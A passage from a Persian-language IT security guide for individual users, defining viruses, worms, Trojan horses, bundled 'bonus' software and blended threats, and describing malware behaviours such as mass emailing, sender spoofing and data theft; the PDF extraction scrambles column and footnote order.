ﺑﺘﻮﺍﻧﺪ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪ ﺑﭙـﺮﺩﺍﺯﺩ .ﺑﺮﺧـﻲ ﺍﺯ
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺑـﺪﺍﻓﺰﺍﺭﻫﺎ،
ﻛﺮﻡ ﺭﺍ ﻧﻴﺰ ﻧﻮﻋﻲ ﻭﻳﺮﻭﺱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ.
ﺍﺳﺐ ﺗﺮﺍﻭﺍ
ﻧﺎﻡ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺯ ﺍﻓـﺴﺎﻧﺔ ﺟﻨـﮓ ﺷـﻬﺮ
ﺗﺮﺍﻭﺍ ﺩﺭ ﻳﻮﻧـﺎﻥ ﺑﺮﮔﺮﻓﺘـﻪ ﺷـﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺁﻥ
ﺍﻓﺴﺎﻧﻪ ،ﻳﻮﻧﺎﻧﻲﻫﺎ ﻳﻚ ﺍﺳﺐ ﭼﻮﺑﻲ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ
ﺩﺭﻭﺍﺯﺓ ﺷﻬﺮ ﺑﻪ ﺩﺍﺧﻞ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ
ﺍﺳﺐ ﻭﺍﺭﺩ ﺷﻬﺮ ﻣﻲﺷﻮﺩ ﺗﻌﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺳـﺮﺑﺎﺯ
ﻳﻮﻧﺎﻧﻲ ﺍﺯ ﺁﻥ ﺧﺎﺭﺝ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺷـﻬﺮ ﺭﺍ ﺑـﻪ
ﺗﺼﺮﻑ ﺧﻮﺩ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌـﺪ
"ﺍﺳﺐ ﺗـﺮﺍﻭﺍ" ﺑـﻪ ﻣﻌﻨـﺎﻱ ﭼﻴـﺰﻱ ﺍﺳـﺖ ﻛـﻪ
ﻇﺎﻫﺮﻱ ﻋﺎﺩﻱ ﺍﻣﺎ ﻣﺤﺘﻮﻳﺎﺗﻲ ﺧﻄﺮﻧﺎﻙ ﺩﺍﺭﺩ.
ﺩﺭ ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ،ﺍﺳـﺐ ﺗـﺮﺍﻭﺍ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺧﺮﺍﺑﻴﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ ﻭ ﻳﺎ ﺍﻋﻤﺎﻟﻲ ﻏﻴﺮ
ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ ﺩﺍﺭﺩ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ.
ﺍﻳﻦ ﺍﺻﻄﻼﺡ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ
ﻻ ﺑـﺪﻭﻥ
ﻣﺨﺮﺑﻲ ﺍﻃﻼﻕ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﻣﻌﻤـﻮ ﹰ
ﺍﻃﻼﻉ ﻭ ﺍﺟﺎﺯﺓ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣﻲﺷـﻮﻧﺪ ﻭ
ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ.
ﻣﻘﺪﻣﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ
٣٦
ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑـﺪﺍﻓﺰﺍﺭ ٣٧ﺍﺳـﺖ .ﺍﻳـﻦ
ﻻ ﺑﺮﺍﻱ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﻳﺎ ﺧﺮﺍﺏ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ
ﻃﺮﺍﺣﻲ ﻣﻲﺷﻮﻧﺪ.
ﺍﻭﻟﻴﻦ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﺳﺎﻝ ۱۹۸۱ﺷﻨﺎﺳﺎﻳﻲ ﺷـﺪ .ﻣﻔﻬـﻮﻡ
ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ ٣٨ﺩﺭ ﻛﺘــﺎﺏ " "Science Fictionﺩﺭ ﺳــﺎﻝ
۱۹۷۵ﻣﻌﺮﻓﻲ ﺷﺪ ﻭ ﺍﻭﻟﻴﻦ ﻓﻌﺎﻟﻴﺖ ﻭﺍﻗﻌﻲ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺍﻭﺍﻳـﻞ
ﺩﻫﺔ ۱۹۸۰ﺍﺳﺖ .ﺟﺎﻟﺐ ﺍﺳﺖ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﻳﻦ ﻛﺮﻣﻬﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ
ﺑﺮﺍﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺷـﺪﻧﺪ ﻛـﻪ ﻋﻤﻠﻜـﺮﺩ ﻣﺜﺒـﺖ ﻭ ﻣﻔﻴـﺪ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ .ﭘﻴـﺪﺍﻳﺶ ﺍﺳـﺒﻬﺎﻱ ﺗـﺮﺍﻭﺍﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ٣٩ﻫـﻢ ﺑـﻪ ﺍﻭﻟـﻴﻦ
ﺭﻭﺯﻫﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ )ﺩﻫﺔ (۱۹۶۰ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ .ﻋﻠﻴﺮﻏﻢ ﺗﺎﺭﻳﺦ
ﻭ ﺳﺎﺑﻘﺔ ﻃﻮﻻﻧﻲ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ،ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺍﺳـﺖ ﻛـﻪ
ﺗﺄﺛﻴﺮﺍﺕ ﻣﺨﺮﺏ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺷـﺪﻳﺪ ﻭ ﺧﻄﺮﻧـﺎﻙ
ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺭ ﺁﻏﺎﺯ ﺑﺎﻳﺪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬﻮﻡ ﺍﻳﻦ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍ ﺗﻌﺮﻳﻒ ﻛﻨﻴﻢ.
ﻭﻳﺮﻭﺱ
ﻭﻳﺮﻭﺱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﺑﺮﻧﺎﻣـﺔ
ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﻣـﻲﺷـﻮﺩ ﻭ ﻳـﺎ ﻭﺍﺭﺩ ﺑﺪﻧـﺔ ﻳـﻚ
ﺑﺮﻧﺎﻣﺔ ﺩﻳﮕﺮ ﻣﻲﮔـﺮﺩﺩ .ﻭﻗﺘـﻲ ﺁﻥ ﺑﺮﻧﺎﻣـﻪ ﺑـﻪ
Malicious Software
Malware
Computer Worms
Computer Trojan Horses
36
37
38
39
ﺑﺨﺶ ﺩﻭﻡ
ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ ،ﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣـﻲ ﺷـﻮﺩ ﻭ
ﻧﺴﺨﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻓﺎﻳﻠﻬﺎ ﻳـﺎ ﺩﻳـﺴﻜﻬﺎﻱ
ﺩﻳﮕﺮ ﻣﻲ ﻛﻨـﺪ ﻭ ﺑﺪﻳﻨـﺼﻮﺭﺕ ﺧـﻮﺩ ﺭﺍ ﺗﻜـﺮﺍﺭ
ﻣﻲ ﻧﻤﺎﻳﺪ ،ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻫﺮﻳـﻚ ﺍﺯ ﻓﺎﻳﻬـﺎ ﻳـﺎ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺁﻟﻮﺩﻩ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺍﻳﻦ ﺭﻭﻧـﺪ ﺑـﺎﺭ
ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻣﻲ ﮔﺮﺩﺩ .ﻭﻳﺮﻭﺱ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻛﺎﺭﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ
ﺍﻧﺠﺎﻡ ﺩﻫﺪ.
٧٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺭﺳﺎﻝ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻧﺮﻡﺍﻓﺰﺍﺭ
""Bonus
ﻧﺮﻡ ﺍﻓﺰﺍﺭ bonusﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺑـﺪﻭﻥ
ﺁﮔﺎﻫﻲ ﺷﻤﺎ ﺣﺎﻭﻱ ﺑﺴﺘﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ
ﺩﺭ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻗـﺮﺍﺭ ﮔـﺮﻓﺘﻦ ﺑـﺴﺘﻪﻫــﺎﻱ
ﺩﻳﮕﺮ ﺩﺭ ﻳﻚ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﺮﺳﻮﻡ ﺍﺳـﺖ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻧﺼﺐ ﻛﻨﻴﺪ
ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺎﻣﻞ ﺑﺮﻧﺎﻣــﺔﻫــﺎﻳﻲ ﭼــﻮﻥ
Adobe Acrobatﻳـــﺎ ﻧـــﺮﻡﺍﻓﺰﺍﺭﻫـــﺎﻱ
ﭼﻨﺪﺭﺳﺎﻧﻪﺍﻱ ﺑﺎﺷﺪ .ﺍﻳﻦ ﺍﻣﺮ ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﺍﺳﺖ
ﻻ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻛﺎﺭﺍﻳﻲ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﺻـﻠﻲ
ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻻ
ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ ﻭ ﺭﻭﻧﺪ ﻓﻌﺎﻟﻴـﺖ ﻧﻴـﺰ ﻣﻌﻤـﻮ ﹰ
ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺳﺖ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﻤﺎﻳـﻞ ﺷـﻤﺎ
ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺭﺍ ﻧﺼﺐ ﻣـﻲﻛﻨـﺪ ﻳـﺎ
ﺍﻳﻨﻜﻪ ﺩﺭ ﺁﻏﺎﺯ ﻧﺼﺐ ﺁﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺷـﻤﺎ ﺭﺍ ﺍﺯ
ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﺁﮔــﺎﻩ ﻣــﻲﺳــﺎﺯﺩ .ﻋﻤﻠﻜــﺮﺩ
ﻻ ﻣﺘﻔــﺎﻭﺕ ﺍﺯ
ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ bonusﻣﻌﻤــﻮ ﹰ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺍﺳـﺖ ﻭ ﺍﮔـﺮ ﭼـﺎﺭﻩﺍﻱ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ ﻣﺴﻠﻤﹰﺎ ﻧﺒﺎﻳﺪ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴﺪ.
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺮﺍﻭﺍ ،ﻭﻳﺮﻭﺱ ﻭ ﻛﺮﻡ ﺑﺮﺍﻱ ﻳﻚ ﺑﺮﻧﺎﻣـﻪ "ﺍﻧﺤـﺼﺎﺭﻱ"
ﻧﻴﺴﺘﻨﺪ .ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺪﺍﻓﺰﺍﺭﻱ ﺑﺎ ﺑـﻴﺶ
ﺍﺯ ﻳﻚ ﻭﻳﮋﮔﻲ ﺑﻨﻮﻳﺴﻨﺪ؛ ﻣﺎﻧﻨﺪ ﺗـﺮﺍﻭﺍﻱ ﺧـﻮﺩ ﺗﻜـﺮﺍﺭ ﺷـﻮﻧﺪﻩ.٤٠
ﺑﺪﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳـﻚ ﺧـﺼﻮﺻﻴﺖ ﻣﺨـﺮﺏ ﺍﺳـﺖ
ﺗﻬﺪﻳﺪ ﭼﻨﺪﻭﺟﻬﻲ ٤١ﻧﺎﻣﻴﺪﻩ ﻣـﻲ ﺷـﻮﺩ .ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ ﻣـﺸﺎﻫﺪﻩ
ﻣــﻲﻛﻨﻴــﺪ ﺍﻳــﻦ ﻋﻨــﺎﻭﻳﻦ ﻋﻤﻮﻣــﹰﺎ ﺍﺯ ﺭﻭﻱ ﻧﺤــﻮﺓ ﮔــﺴﺘﺮﺵ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺗﻌﺮﻳﻒ ﺷﺪﻩﺍﻧﺪ ﻭ ﻧـﻪ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺤـﻮﺓ
ﻋﻤﻠﻜﺮﺩ ﺁﻧﻬﺎ .ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﭼﮕﻮﻧﮕﻲ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ
ﺭﺍﻫﻬﺎﻱ ﺍﻧﺘﺸﺎﺭ ﺁﻧﻬﺎ ﺑﺮﺭﺳـﻲ ﻣـﻲﺷـﻮﺩ .ﺩﺭ ﻓـﺼﻠﻬﺎﻱ ﺑﻌـﺪ ﻧﻴـﺰ
ﺭﻭﺷﻬﺎﻱ ﺍﻳﻤﻦ ﺳـﺎﺧﺘﻦ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺷـﺒﻜﻪﻫـﺎ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺍﻳـﻦ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ.
ﻋﻤﻠﻜﺮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ
ﻫﻴﭻ ﻣﺤﺪﻭﺩﻳﺘﻲ ﺩﺭ ﭼﮕﻮﻧﮕﻲ ﻓﻌﺎﻟﻴـﺖ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ ﻣﺨـﺮﺏ
ﻻ ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺩﺭ
ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻭﺟﻮﺩ ﻧـﺪﺍﺭﺩ ،ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺧﻮﺩ ﻭﺍﺟﺪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﻣﺸﺘﺮﻛﻲ ﻫﺴﺘﻨﺪ:
Self-Replicating Trojan
Blended Threat
40
41
ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻳﻜــﻲ ﺍﺯ ﺭﺍﻳﺠﺘــﺮﻳﻦ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ
ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﺨـﺮﺏ ﺍﺳـﺖ .ﻧﺎﻣـﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﺿﻤﻴﻤﻪ ﺍﻱ ٤٢ﺷﺎﻣﻞ ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻣﺘﻦ ٤٣ﺁﻥ ﻧﻴﺰ
ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻃﻼﻋﺎﺕ ﺧﺎﺻـﻲ ﺗﻨﻈـﻴﻢ ﺷـﺪﻩ ﺑﺎﺷـﺪ )ﻧﻈﻴـﺮ
ﻫﺸﺪﺍﺭﻫﺎﻱ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ( ﻳﺎ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ
ﺩﺍﺭﺍﻱ ﻳﻚ ﻗﺴﻤﺖ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﻧﺎﻣﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﭘﻴـﺸﻴﻦ
ﺷﻤﺎ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻣﻮﺟﻮﺩ ﺍﺳﺖ .ﺍﮔﺮ ﺿـﻤﻴﻤﺔ ﻧﺎﻣـﻪ ﻓﺎﻳـﻞ
ﻻ ﻣﺘﻦ ﺁﻥ ﺑﻪ ﻧﺤـﻮﻱ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﻨـﺪﻩ ﺭﺍ
ﺧﻄﺮﻧﺎﻛﻲ ﺑﺎﺷﺪ ،ﻣﻌﻤﻮ ﹰ
٤٤
ﺗﺸﻮﻳﻖ ﻣﻲﻧﻤﺎﻳﺪ ﻛﻪ ﺿﻤﻴﻤﻪ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ .ﻓﻴﻠﺪﻫﺎﻱ ﻣﻮﺿـﻮﻉ ﻭ
ﻻ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻣﻲﺷـﻮﻧﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺭﺍ
ﻓﺮﺳﺘﻨﺪﻩ ٤٥ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﺗﺸﻮﻳﻖ ﻛﻨﻨﺪ ﻛﻪ ﻓﺎﻳﻞ ﺿﻤﻴﻤﻪ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ )ﻣﺜﻞ ﻛﺮﻡ ﻣﺸﻬﻮﺭﻱ ﻛـﻪ
ﻻ ﺑـﺮﺍﻱ
ﻣﻮﺿﻮﻉ ﺁﻥ " "I Love Youﺑﻮﺩ( .ﺍﻳـﻦ ﻧـﻮﻉ ﭘﻴﺎﻣﻬـﺎ ﻣﻌﻤـﻮ ﹰ
ﺍﻓﺮﺍﺩﻱ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺁﺩﺭﺱ ﺁﻧﻬﺎ ﺩﺭ ﻓﻬﺮﺳﺖ ﺁﺩﺭﺳـﻬﺎ ﻳـﺎ
ﻓﺎﻳﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍﻳﺎﻧﺔ ﺁﻟـﻮﺩﻩ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﻭﻗﺘـﻲ
ﭘﻴﺎﻣﻬﺎ ﺑﺮﺍﻱ ﻫﻤﺔ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺍﺭﺳﺎﻝ ﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻣﺘﻮﻗﻒ ﻣﻲﮔـﺮﺩﺩ،
ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑﺎﺯ ﻫﻢ ﻓﻌﺎﻟﻴﺖ ﺧﻮﺩ ﺭﺍ -ﭼـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ ﺍﻭﻟﻴـﻪ ﻭ
ﭼﻪ ﺍﺯ ﻣﺒﺎﺩﻱ ﺟﺪﻳﺪ -ﺍﺯ ﺳﺮ ﻣﻲﮔﻴﺮﺩ .ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ
ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﻓﺮﺩ ﺩﻳﮕﺮﻱ ﺑﺎ ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ ﺁﻟﻮﺩﻩ ﺷﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺁﻥ
ﻭﻳﺮﻭﺱ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻓﻴﻠـﺪ "ﻓﺮﺳـﺘﻨﺪﻩ" ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺁﻟﻮﺩﻩ ﮔﺬﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﺷﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﺩﻟﻴـﻞ ﻛـﻪ ﺁﺩﺭﺱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﻣﺎﺷـﻴﻦ
ﺁﻟﻮﺩﻩ ﻳﺎﻓﺘﻪ ﺍﺳﺖ( ﺍﻳﻦ ﺷـﻤﺎ ﻫـﺴﺘﻴﺪ ﻛـﻪ ﻣـﺘﻬﻢ ﺑـﻪ ﺗﻮﺯﻳـﻊ ﺍﻳـﻦ
ﻭﻳﺮﻭﺱ ﺧﻮﺍﻫﻴﺪ ﺷﺪ! )ﺍﻳﻦ ﻓﻦ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﮔﻲ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ٤٦ﻧـﺎﻡ
ﺩﺍﺭﺩ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺑﺮﻧﺎﻣﺔ ﻣﺨﺮﺏ ﺍﺯ ﺁﻥ ،ﺑﺴﺎﺩﮔﻲ ﻧﻤﻲﺗﻮﺍﻥ ﻣـﺸﺨﺺ
ﻛﺮﺩ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺁﻟﻮﺩﺓ ﻭﺍﻗﻌﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﭼﻪ ﻛﺴﻲ ﺍﺳﺖ(
ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻣﻲ ﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻭ
ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺁﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻭ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ
ﻧﻮﻳﺴﻨﺪﺓ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﻫﻤـﺔ ﻓﺎﻳﻠﻬـﺎﻱ
ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ )ﺣﺘﻲ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ( ﺭﺍ ﺑﺨﻮﺍﻧﺪ .ﺍﮔﺮ ﺍﻃﻼﻋـﺎﺕ
ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺫﺧﻴـﺮﻩ
ﻣﻲ ﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺎﺷﻨﺪ.
ﺍﮔﺮ ﺍﺯ ﺍﻣﻀﺎﻱ ﺧﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺗﺼﻮﻳﺮﻱ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺑﺎﺷـﻴﺪ ﺗـﺎ ﺍﺯ
Attachment
Body
Subject Field
From Field
Email Spoofing
42
43
44
45
46
٧٣
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺁﻥ ﺩﺭ ﭼﺎﭖ ﻭ ﻳﺎ ﺍﺭﺳﺎﻝ ﻧﺎﻣﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﺁﻥ ﻫـﻢ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﻜﺎﺭ ﻣﻬﺎﺟﻤﺎﻥ ﺑﻴﺎﻳﺪ .ﺟﻤﻊﺁﻭﺭﻱ ﺍﻳﻦ ﺑﺴﺘﻪ ﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ
ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩ ﻛﻪ
ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻫﻮﻳﺖ ﺷﻤﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ .ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﺷـﺮﻛﺖ
ﺗﺠﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮ
ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲ ﻧﻤﺎﻳﻴﺪ ،ﺩﺭﺻﻮﺭﺕ ﺩﺯﺩﻳـﺪﻩ ﺷـﺪﻥ
